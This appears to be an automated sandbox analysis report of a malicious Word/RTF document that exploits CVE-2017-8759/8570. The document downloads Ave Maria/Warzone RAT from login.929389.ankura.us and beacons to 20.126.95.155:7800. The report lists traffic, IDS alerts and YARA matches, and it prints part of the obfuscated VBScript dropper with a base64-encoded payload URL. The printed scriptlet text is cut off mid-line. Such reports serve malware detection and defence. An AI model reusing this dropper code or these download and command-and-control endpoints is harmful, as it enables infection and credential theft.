Source: global traffic TCP traffic: 159.223.2.212:80 -> 192.168.2.22:49171
Source: global traffic TCP traffic: 192.168.2.22:49171 -> 159.223.2.212:80
Source: global traffic TCP traffic: 192.168.2.22:49171 -> 159.223.2.212:80
Source: global traffic TCP traffic: 159.223.2.212:80 -> 192.168.2.22:49171
Source: global traffic TCP traffic: 192.168.2.22:49171 -> 159.223.2.212:80
Source: global traffic TCP traffic: 159.223.2.212:80 -> 192.168.2.22:49171
Source: global traffic TCP traffic: 159.223.2.212:80 -> 192.168.2.22:49171
Source: global traffic TCP traffic: 159.223.2.212:80 -> 192.168.2.22:49171
Source: global traffic TCP traffic: 159.223.2.212:80 -> 192.168.2.22:49171
Source: global traffic TCP traffic: 159.223.2.212:80 -> 192.168.2.22:49171
Source: global traffic TCP traffic: 192.168.2.22:49171 -> 159.223.2.212:80
Source: global traffic TCP traffic: 159.223.2.212:80 -> 192.168.2.22:49171
Source: global traffic TCP traffic: 192.168.2.22:49171 -> 159.223.2.212:80
Source: global traffic TCP traffic: 159.223.2.212:80 -> 192.168.2.22:49171
Source: global traffic TCP traffic: 192.168.2.22:49171 -> 159.223.2.212:80
Source: global traffic TCP traffic: 192.168.2.22:49171 -> 159.223.2.212:80
Source: global traffic TCP traffic: 192.168.2.22:49171 -> 159.223.2.212:80
Source: global traffic TCP traffic: 192.168.2.22:49171 -> 159.223.2.212:80
Source: global traffic TCP traffic: 192.168.2.22:49171 -> 159.223.2.212:80
Source: global traffic TCP traffic: 159.223.2.212:80 -> 192.168.2.22:49171
Source: global traffic TCP traffic: 159.223.2.212:80 -> 192.168.2.22:49171
Source: global traffic TCP traffic: 159.223.2.212:80 -> 192.168.2.22:49171
Source: global traffic TCP traffic: 159.223.2.212:80 -> 192.168.2.22:49171
Source: global traffic TCP traffic: 192.168.2.22:49171 -> 159.223.2.212:80
Source: global traffic TCP traffic: 192.168.2.22:49171 -> 159.223.2.212:80
Source: global traffic TCP traffic: 192.168.2.22:49171 -> 159.223.2.212:80
Source: global traffic TCP traffic: 159.223.2.212:80 -> 192.168.2.22:49171
Source: global traffic TCP traffic: 192.168.2.22:49171 -> 159.223.2.212:80
Source: global traffic TCP traffic: 159.223.2.212:80 -> 192.168.2.22:49171
Source: global traffic TCP traffic: 159.223.2.212:80 -> 192.168.2.22:49171
Source: global traffic TCP traffic: 192.168.2.22:49171 -> 159.223.2.212:80
Source: global traffic TCP traffic: 192.168.2.22:49171 -> 159.223.2.212:80
Source: global traffic TCP traffic: 159.223.2.212:80 -> 192.168.2.22:49171
Source: global traffic TCP traffic: 159.223.2.212:80 -> 192.168.2.22:49171
Source: global traffic TCP traffic: 159.223.2.212:80 -> 192.168.2.22:49171
Source: global traffic TCP traffic: 192.168.2.22:49171 -> 159.223.2.212:80
Source: global traffic TCP traffic: 159.223.2.212:80 -> 192.168.2.22:49171
Source: global traffic TCP traffic: 159.223.2.212:80 -> 192.168.2.22:49171
Source: global traffic TCP traffic: 192.168.2.22:49171 -> 159.223.2.212:80
Source: global traffic TCP traffic: 159.223.2.212:80 -> 192.168.2.22:49171
Source: global traffic TCP traffic: 192.168.2.22:49171 -> 159.223.2.212:80
Source: global traffic TCP traffic: 192.168.2.22:49171 -> 159.223.2.212:80
Source: global traffic TCP traffic: 192.168.2.22:49171 -> 159.223.2.212:80
Source: global traffic TCP traffic: 159.223.2.212:80 -> 192.168.2.22:49171
Source: global traffic TCP traffic: 159.223.2.212:80 -> 192.168.2.22:49171
Source: global traffic TCP traffic: 159.223.2.212:80 -> 192.168.2.22:49171
Source: global traffic TCP traffic: 192.168.2.22:49171 -> 159.223.2.212:80
Source: global traffic TCP traffic: 159.223.2.212:80 -> 192.168.2.22:49171
Source: global traffic TCP traffic: 192.168.2.22:49171 -> 159.223.2.212:80
Source: global traffic TCP traffic: 192.168.2.22:49171 -> 159.223.2.212:80
Source: global traffic TCP traffic: 192.168.2.22:49171 -> 159.223.2.212:80
Source: global traffic TCP traffic: 159.223.2.212:80 -> 192.168.2.22:49171
Source: global traffic DNS query: name: login.929389.ankura.us
Source: global traffic TCP traffic: 192.168.2.22:49172 -> 159.223.2.212:80

Networking

Source: Traffic Snort IDS: 2852326 ETPRO TROJAN Ave Maria/Warzone RAT InitializePacket 20.126.95.155:7800 -> 192.168.2.22:49173
Source: Traffic Snort IDS: 2036735 ET TROJAN Ave Maria/Warzone RAT Encrypted CnC Checkin (Inbound) 20.126.95.155:7800 -> 192.168.2.22:49173
Source: Traffic Snort IDS: 2852327 ETPRO TROJAN Ave Maria/Warzone RAT BeaconResponse 192.168.2.22:49173 -> 20.126.95.155:7800
Source: Traffic Snort IDS: 2036734 ET TROJAN Ave Maria/Warzone RAT Encrypted CnC Checkin 192.168.2.22:49173 -> 20.126.95.155:7800
Source: Traffic Snort IDS: 2852329 ETPRO TROJAN Ave Maria/Warzone RAT PingCommand 20.126.95.155:7800 -> 192.168.2.22:49173
Source: Traffic Snort IDS: 2852328 ETPRO TROJAN Ave Maria/Warzone RAT PingResponse 192.168.2.22:49173 -> 20.126.95.155:7800
Source: Malware configuration extractor URLs: 20.126.95.155
Source: global traffic HTTP traffic detected: GET /AwOgYiWG/explorer.exe HTTP/1.1Host: login.929389.ankura.usConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /AwOgYiWG/explorer.exe HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: login.929389.ankura.usConnection: Keep-Alive
Source: Joe Sandbox View ASN Name: MICROSOFT-CORP-MSN-AS-BLOCKUS MICROSOFT-CORP-MSN-AS-BLOCKUS
Source: Joe Sandbox View ASN Name: CELANESE-US CELANESE-US
Source: global traffic TCP traffic: 192.168.2.22:49173 -> 20.126.95.155:7800
Source: powershell.exe, 00000004.00000002.922412299.00000000034EA000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.945493168.00000000034AA000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000013.00000002.985143233.0000000003643000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: httP://login.929
Source: powershell.exe, 00000013.00000002.985143233.0000000003643000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: httP://login.929389.ank
Source: powershell.exe, 00000004.00000002.922412299.00000000034EA000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.945493168.00000000034AA000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000013.00000002.985143233.0000000003643000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: httP://login.929389.ankura.us/Aw
Source: powershell.exe, 00000013.00000002.985143233.0000000003643000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: httP://login.929389.ankura.us/AwOgYiWG/explorer.exe
Source: powershell.exe, 00000004.00000002.922412299.00000000034EA000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.945493168.00000000034AA000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000013.00000002.985143233.0000000003643000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: httP://login.929389.ankura.us/AwOgYiWG/explorer.exePE
Source: powershell.exe, 00000004.00000002.922412299.00000000034EA000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.922726566.00000000035E7000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://login.929389.ankura.us
Source: powershell.exe, 00000004.00000002.922412299.00000000034EA000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.926952704.000000001B39C000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://login.929389.ankura.us/AwOgYiWG/explorer.exe
Source: explorer.exe, 00000008.00000002.964367584.0000000002891000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000014.00000002.985267506.000000000289A000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 0000001D.00000002.1032698870.000000000289A000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: powershell.exe, 00000009.00000002.936831112.000000000038E000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://www.piriform.com/ccleaner
Source: powershell.exe, 00000009.00000002.936831112.000000000038E000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://www.piriform.com/ccleanerhttp://www.piriform.com/ccleanerv
Source: explorer.exe, 00000008.00000002.971704816.0000000003A0D000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000008.00000002.964367584.0000000002891000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000011.00000003.963529024.00000000006B1000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000011.00000000.956682708.0000000000414000.00000040.00000400.00020000.00000000.sdmp, MSBuild.exe, 00000011.00000003.963466175.00000000006A5000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000011.00000003.963980442.00000000006B7000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000014.00000002.985267506.000000000289A000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 0000001D.00000002.1032860739.00000000028B4000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://github.com/syohex/java-simple-mine-sweeperC:
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{9CEE7D2D-9EE4-4FEB-932A-E7FDD2AB9079}.tmp Jump to behavior
Source: unknown DNS traffic detected: queries for: login.929389.ankura.us
Source: unknown TCP traffic detected without corresponding DNS query: 20.126.95.155
Source: explorer.exe, 00000008.00000002.971704816.0000000003A0D000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: GetRawInputData

E-Banking Fraud

Source: Yara match File source: 29.2.explorer.exe.28d63b8.2.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 8.2.explorer.exe.3a2b638.11.unpack, type: UNPACKEDPE
Source: Yara match File source: 29.2.explorer.exe.28e9850.3.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 8.2.explorer.exe.28e1ce0.7.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 20.2.explorer.exe.28daffc.3.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 20.2.explorer.exe.28d3db0.2.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 17.0.MSBuild.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 20.2.explorer.exe.28e7248.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 29.2.explorer.exe.28dd604.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 8.2.explorer.exe.28daa94.5.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 8.2.explorer.exe.28edf2c.6.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 8.2.explorer.exe.3a0d418.10.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 8.2.explorer.exe.3a2b638.11.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000011.00000003.963529024.00000000006B1000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000014.00000002.985267506.000000000289A000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000011.00000000.956682708.0000000000414000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000008.00000002.971704816.0000000003A0D000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000011.00000003.963466175.00000000006A5000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000011.00000003.963980442.00000000006B7000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000001D.00000002.1032860739.00000000028B4000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000008.00000002.964367584.0000000002891000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY

System Summary

Source: Item Selection - Inquiry 0054363AZH - AltayGlobal Trading.doc, type: SAMPLE Matched rule: detects CVE-2017-8759 or CVE-2017-8570 weaponized RTF documents. Author: ditekSHen
Source: 17.3.MSBuild.exe.6a5d90.1.unpack, type: UNPACKEDPE Matched rule: Detects Codoso APT Gh0st Malware Author: Florian Roth
Source: 29.2.explorer.exe.28d63b8.2.raw.unpack, type: UNPACKEDPE Matched rule: Detects Codoso APT Gh0st Malware Author: Florian Roth
Source: 29.2.explorer.exe.28d63b8.2.raw.unpack, type: UNPACKEDPE Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 29.2.explorer.exe.28d63b8.2.raw.unpack, type: UNPACKEDPE Matched rule: Detects executables embedding command execution via IExecuteCommand COM object Author: ditekSHen
Source: 29.2.explorer.exe.28d63b8.2.raw.unpack, type: UNPACKEDPE Matched rule: Detects AveMaria/WarzoneRAT Author: ditekSHen
Source: 29.2.explorer.exe.28d63b8.2.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_AveMaria_31d2bce9 Author: unknown
Source: 29.2.explorer.exe.28d63b8.2.raw.unpack, type: UNPACKEDPE Matched rule: AveMaria_WarZone Author: unknown
Source: 8.2.explorer.exe.3a2b638.11.unpack, type: UNPACKEDPE Matched rule: Detects Codoso APT Gh0st Malware Author: Florian Roth
Source: 8.2.explorer.exe.3a2b638.11.unpack, type: UNPACKEDPE Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 8.2.explorer.exe.3a2b638.11.unpack, type: UNPACKEDPE Matched rule: Detects executables embedding command execution via IExecuteCommand COM object Author: ditekSHen
Source: 8.2.explorer.exe.3a2b638.11.unpack, type: UNPACKEDPE Matched rule: Detects AveMaria/WarzoneRAT Author: ditekSHen
Source: 8.2.explorer.exe.3a2b638.11.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_AveMaria_31d2bce9 Author: unknown
Source: 8.2.explorer.exe.3a2b638.11.unpack, type: UNPACKEDPE Matched rule: AveMaria_WarZone Author: unknown
Source: 29.2.explorer.exe.28e9850.3.raw.unpack, type: UNPACKEDPE Matched rule: Detects Codoso APT Gh0st Malware Author: Florian Roth
Source: 29.2.explorer.exe.28e9850.3.raw.unpack, type: UNPACKEDPE Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 29.2.explorer.exe.28e9850.3.raw.unpack, type: UNPACKEDPE Matched rule: Detects executables embedding command execution via IExecuteCommand COM object Author: ditekSHen
Source: 29.2.explorer.exe.28e9850.3.raw.unpack, type: UNPACKEDPE Matched rule: Detects AveMaria/WarzoneRAT Author: ditekSHen
Source: 29.2.explorer.exe.28e9850.3.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_AveMaria_31d2bce9 Author: unknown
Source: 29.2.explorer.exe.28e9850.3.raw.unpack, type: UNPACKEDPE Matched rule: AveMaria_WarZone Author: unknown
Source: 8.2.explorer.exe.28e1ce0.7.raw.unpack, type: UNPACKEDPE Matched rule: Detects Codoso APT Gh0st Malware Author: Florian Roth
Source: 8.2.explorer.exe.28e1ce0.7.raw.unpack, type: UNPACKEDPE Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 8.2.explorer.exe.28e1ce0.7.raw.unpack, type: UNPACKEDPE Matched rule: Detects executables embedding command execution via IExecuteCommand COM object Author: ditekSHen
Source: 8.2.explorer.exe.28e1ce0.7.raw.unpack, type: UNPACKEDPE Matched rule: Detects AveMaria/WarzoneRAT Author: ditekSHen
Source: 8.2.explorer.exe.28e1ce0.7.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_AveMaria_31d2bce9 Author: unknown
Source: 8.2.explorer.exe.28e1ce0.7.raw.unpack, type: UNPACKEDPE Matched rule: AveMaria_WarZone Author: unknown
Source: 20.2.explorer.exe.28daffc.3.raw.unpack, type: UNPACKEDPE Matched rule: Detects Codoso APT Gh0st Malware Author: Florian Roth
Source: 20.2.explorer.exe.28daffc.3.raw.unpack, type: UNPACKEDPE Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 20.2.explorer.exe.28daffc.3.raw.unpack, type: UNPACKEDPE Matched rule: Detects executables embedding command execution via IExecuteCommand COM object Author: ditekSHen
Source: 20.2.explorer.exe.28daffc.3.raw.unpack, type: UNPACKEDPE Matched rule: Detects AveMaria/WarzoneRAT Author: ditekSHen
Source: 20.2.explorer.exe.28daffc.3.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_AveMaria_31d2bce9 Author: unknown
Source: 20.2.explorer.exe.28daffc.3.raw.unpack, type: UNPACKEDPE Matched rule: AveMaria_WarZone Author: unknown
Source: 20.2.explorer.exe.28d3db0.2.raw.unpack, type: UNPACKEDPE Matched rule: Detects Codoso APT Gh0st Malware Author: Florian Roth
Source: 20.2.explorer.exe.28d3db0.2.raw.unpack, type: UNPACKEDPE Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 20.2.explorer.exe.28d3db0.2.raw.unpack, type: UNPACKEDPE Matched rule: Detects executables embedding command execution via IExecuteCommand COM object Author: ditekSHen
Source: 20.2.explorer.exe.28d3db0.2.raw.unpack, type: UNPACKEDPE Matched rule: Detects AveMaria/WarzoneRAT Author: ditekSHen
Source: 20.2.explorer.exe.28d3db0.2.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_AveMaria_31d2bce9 Author: unknown
Source: 20.2.explorer.exe.28d3db0.2.raw.unpack, type: UNPACKEDPE Matched rule: AveMaria_WarZone Author: unknown
Source: 17.0.MSBuild.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Detects Codoso APT Gh0st Malware Author: Florian Roth
Source: 17.0.MSBuild.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 17.0.MSBuild.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Detects executables embedding command execution via IExecuteCommand COM object Author: ditekSHen
Source: 17.0.MSBuild.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Detects AveMaria/WarzoneRAT Author: ditekSHen
Source: 17.0.MSBuild.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_AveMaria_31d2bce9 Author: unknown
Source: 17.0.MSBuild.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: AveMaria_WarZone Author: unknown
Source: 20.2.explorer.exe.28e7248.1.raw.unpack, type: UNPACKEDPE Matched rule: Detects Codoso APT Gh0st Malware Author: Florian Roth
Source: 20.2.explorer.exe.28e7248.1.raw.unpack, type: UNPACKEDPE Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 20.2.explorer.exe.28e7248.1.raw.unpack, type: UNPACKEDPE Matched rule: Detects executables embedding command execution via IExecuteCommand COM object Author: ditekSHen
Source: 20.2.explorer.exe.28e7248.1.raw.unpack, type: UNPACKEDPE Matched rule: Detects AveMaria/WarzoneRAT Author: ditekSHen
Source: 20.2.explorer.exe.28e7248.1.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_AveMaria_31d2bce9 Author: unknown
Source: 20.2.explorer.exe.28e7248.1.raw.unpack, type: UNPACKEDPE Matched rule: AveMaria_WarZone Author: unknown
Source: 29.2.explorer.exe.28dd604.1.raw.unpack, type: UNPACKEDPE Matched rule: Detects Codoso APT Gh0st Malware Author: Florian Roth
Source: 29.2.explorer.exe.28dd604.1.raw.unpack, type: UNPACKEDPE Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 29.2.explorer.exe.28dd604.1.raw.unpack, type: UNPACKEDPE Matched rule: Detects executables embedding command execution via IExecuteCommand COM object Author: ditekSHen
Source: 29.2.explorer.exe.28dd604.1.raw.unpack, type: UNPACKEDPE Matched rule: Detects AveMaria/WarzoneRAT Author: ditekSHen
Source: 29.2.explorer.exe.28dd604.1.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_AveMaria_31d2bce9 Author: unknown
Source: 29.2.explorer.exe.28dd604.1.raw.unpack, type: UNPACKEDPE Matched rule: AveMaria_WarZone Author: unknown
Source: 8.2.explorer.exe.28daa94.5.raw.unpack, type: UNPACKEDPE Matched rule: Detects Codoso APT Gh0st Malware Author: Florian Roth
Source: 8.2.explorer.exe.28daa94.5.raw.unpack, type: UNPACKEDPE Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 8.2.explorer.exe.28daa94.5.raw.unpack, type: UNPACKEDPE Matched rule: Detects executables embedding command execution via IExecuteCommand COM object Author: ditekSHen
Source: 8.2.explorer.exe.28daa94.5.raw.unpack, type: UNPACKEDPE Matched rule: Detects AveMaria/WarzoneRAT Author: ditekSHen
Source: 8.2.explorer.exe.28daa94.5.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_AveMaria_31d2bce9 Author: unknown
Source: 8.2.explorer.exe.28daa94.5.raw.unpack, type: UNPACKEDPE Matched rule: AveMaria_WarZone Author: unknown
Source: 8.2.explorer.exe.28edf2c.6.raw.unpack, type: UNPACKEDPE Matched rule: Detects Codoso APT Gh0st Malware Author: Florian Roth
Source: 8.2.explorer.exe.28edf2c.6.raw.unpack, type: UNPACKEDPE Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 8.2.explorer.exe.28edf2c.6.raw.unpack, type: UNPACKEDPE Matched rule: Detects executables embedding command execution via IExecuteCommand COM object Author: ditekSHen
Source: 8.2.explorer.exe.28edf2c.6.raw.unpack, type: UNPACKEDPE Matched rule: Detects AveMaria/WarzoneRAT Author: ditekSHen
Source: 8.2.explorer.exe.28edf2c.6.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_AveMaria_31d2bce9 Author: unknown
Source: 8.2.explorer.exe.28edf2c.6.raw.unpack, type: UNPACKEDPE Matched rule: AveMaria_WarZone Author: unknown
Source: 8.2.explorer.exe.3a0d418.10.raw.unpack, type: UNPACKEDPE Matched rule: Detects executables embedding command execution via IExecuteCommand COM object Author: ditekSHen
Source: 8.2.explorer.exe.3a0d418.10.raw.unpack, type: UNPACKEDPE Matched rule: Detects AveMaria/WarzoneRAT Author: ditekSHen
Source: 8.2.explorer.exe.3a0d418.10.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_AveMaria_31d2bce9 Author: unknown
Source: 8.2.explorer.exe.3a2b638.11.raw.unpack, type: UNPACKEDPE Matched rule: Detects executables embedding command execution via IExecuteCommand COM object Author: ditekSHen
Source: 8.2.explorer.exe.3a2b638.11.raw.unpack, type: UNPACKEDPE Matched rule: Detects AveMaria/WarzoneRAT Author: ditekSHen
Source: 8.2.explorer.exe.3a2b638.11.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_AveMaria_31d2bce9 Author: unknown
Source: 00000011.00000003.963529024.00000000006B1000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_AveMaria_31d2bce9 Author: unknown
Source: 00000014.00000002.985267506.000000000289A000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_AveMaria_31d2bce9 Author: unknown
Source: 00000011.00000000.956682708.0000000000414000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_AveMaria_31d2bce9 Author: unknown
Source: 00000008.00000002.971704816.0000000003A0D000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_AveMaria_31d2bce9 Author: unknown
Source: 00000011.00000003.963466175.00000000006A5000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_AveMaria_31d2bce9 Author: unknown
Source: 00000011.00000003.963980442.00000000006B7000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_AveMaria_31d2bce9 Author: unknown
Source: 0000001D.00000002.1032860739.00000000028B4000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_AveMaria_31d2bce9 Author: unknown
Source: 00000008.00000002.964367584.0000000002891000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_AveMaria_31d2bce9 Author: unknown
Source: ~WRF{C4F4A2E4-AFFD-48B2-B382-6AEAEB7457BF}.tmp.0.dr Stream path '_1725425945/\x1Ole10Native' : :....DZdtfhgYgeghD{.scT.C:\osdsTggH\DZdtfhgYgeghD{.scT..... ...C:\9jkepaD\DZdtfhgYgeghD{.scT.s....<scriptleT.. >..<script language = 'vbscript'>....fsdfdsfs = "aHR0UDovL2xvZ2luLjkyOTM4OS5hbmt1cmEudXMvQXdPZ1lpV0cvZXhwbG9yZXIuZXhl" '98t9t..yulkytjtrhtjrkdsarjky ="ZXhwbG9yZXIuZXhl" '98t9t....sdpfkdfhow = "..F0.........ECD7............B8......9C.9892....9B"..sdpfkdfhow = "..F0.........ECD7............B8......9C.9892....9B"....Function age64Procode(ByVal cvwtr5ycbve, ByVal trtsk484t378).. Dim xtexenc.. if trtsk484t378 Then xtexenc = "utf-16le" Else xtexenc = "utf" + "-8".. ' Use an aux. XML document with a Base64-encoded element... ' Assigning the encoded text to .Text makes the decoded byte array.. ' available via .nodeTypedValue, which we can pass to BytesToStr().. kvjusvsfdcsb = "bje".. cvbnm = "CreateO" + kvjusvsfdcsb + "ct".. soswjwslvc = "reate".. mosdoepfy9eqje = "Se".. vposaleusaogr = "(""Msx".. vposaleusaogr = vposaleusaogr + "ml2.".. vposaleusaogr = vposaleusaogr + "DOMDocument"").C".. mosdoepfy9eqje = mosdoepfy9eqje + "t alxmd = " + cvbnm + vposaleusaogr + soswjwslvc + "E".. mosdoepfy9eqje = mosdoepfy9eqje + "l".. mosdoepfy9eqje = mosdoepfy9eqje + "em".. mosdoepfy9eqje = mosdoepfy9eqje + "ent(".. mosdoepfy9eqje = mosdoepfy9eqje + """a".. mosdoepfy9eqje = mosdoepfy9eqje + "ux"")".. 'MsgBox(mosdoepfy9eqje).. var1 = mosdoepfy9eqje...sn556 = "ex" + "ec" + "ute" + "(var1)".. dim a32947234987235:execute sn556.. ksvjvwdwye2r = "Data".. odjeiojfyd2f8fu34u = "alxmd." + ksvjvwdwye2r + "Type = wslausfychks".. var1 = odjeiojfyd2f8fu34u.... sn556 = "ex" + "ec" + "ute" + "(var1)".. dim a32947234987234:execute(sn556)....'MsgBox(aaaaaaaadddd).. vartyzx = "md".. vartx = ".Tex"...rey45r3t3e3yhju = "alx" + vartyzx + vartx + "t = cvwtr5ycbve".. buicd78 = "alxmd.Text = cvwtr5ycbve".... var1 = buicd78.. sn556 = "ex" + "ec" + "ute" + "(var1)".. 
dim a32947234987236:execute sn556.... age64Procode = BytesToStr(alxmd.NodeTypedValue, xtexenc)..End Function....function BytesToStr(ByVal byteArray, ByVal xtexenc).. lfkfdiooie = "utf".. lfkfdiooie = lfkfdiooie + "-16le".. If LCase(xtexenc) = lfkfdiooie then.. ' UTF-16 LE happens to be VBScript's internal encoding, so we can.. ' take a shortcut and use CStr() to directly convert the byte array.. ' to a string... knrudogh = "BytesToStr = CStr(byteArray)".. var1 = knrudogh.. sn556 = "ex" + "ec" + "ute" + "(var1)".. kjkxvlsvllf=0:execute sn556.. Else ' Convert the specified text encoding to a VBScript string... ' Create a binary stream and copy the input byte array to it... vgct783hth = "bj".. vgct783hth = vgct783hth + "ect".. piiing = "CreateO" + vgct783hth.. ldiwuywfj = "Set ".. lsvosfouwoupwiot = ldiwuywfj + "baax = " + piiing + "(aaax)".... var1 = lsvosfouwoupwiot.. sn556 = "ex" + "ecute(var1)"..
Source: ~WRF{C4F4A2E4-AFFD-48B2-B382-6AEAEB7457BF}.tmp.0.dr Stream path '_1725426018/\x1Ole10Native' : ;....DZdtfhgYgeghD{.scT.C:\osdsTggH\DZdtfhgYgeghD{.scT.....6...C:\Users\user\AppData\Local\Temp\DZdtfhgYgeghD{.scT.w:....<scriptleT.. >..<script language = 'vbscript'>....fsdfdsfs = "aHR0UDovL2xvZ2luLjkyOTM4OS5hbmt1cmEudXMvQXdPZ1lpV0cvZXhwbG9yZXIuZXhl" '98t9t..yulkytjtrhtjrkdsarjky ="ZXhwbG9yZXIuZXhl" '98t9t....sdpfkdfhow = "..F0.........ECD7............B8......9C.9892....9B"..sdpfkdfhow = "..F0.........ECD7............B8......9C.9892....9B"....Function age64Procode(ByVal cvwtr5ycbve, ByVal trtsk484t378).. Dim xtexenc.. if trtsk484t378 Then xtexenc = "utf-16le" Else xtexenc = "utf" + "-8".. ' Use an aux. XML document with a Base64-encoded element... ' Assigning the encoded text to .Text makes the decoded byte array.. ' available via .nodeTypedValue, which we can pass to BytesToStr().. kvjusvsfdcsb = "bje".. cvbnm = "CreateO" + kvjusvsfdcsb + "ct".. soswjwslvc = "reate".. mosdoepfy9eqje = "Se".. vposaleusaogr = "(""Msx".. vposaleusaogr = vposaleusaogr + "ml2.".. vposaleusaogr = vposaleusaogr + "DOMDocument"").C".. mosdoepfy9eqje = mosdoepfy9eqje + "t alxmd = " + cvbnm + vposaleusaogr + soswjwslvc + "E".. mosdoepfy9eqje = mosdoepfy9eqje + "l".. mosdoepfy9eqje = mosdoepfy9eqje + "em".. mosdoepfy9eqje = mosdoepfy9eqje + "ent(".. mosdoepfy9eqje = mosdoepfy9eqje + """a".. mosdoepfy9eqje = mosdoepfy9eqje + "ux"")".. 'MsgBox(mosdoepfy9eqje).. var1 = mosdoepfy9eqje...sn556 = "ex" + "ec" + "ute" + "(var1)".. dim a32947234987235:execute sn556.. ksvjvwdwye2r = "Data".. odjeiojfyd2f8fu34u = "alxmd." + ksvjvwdwye2r + "Type = wslausfychks".. var1 = 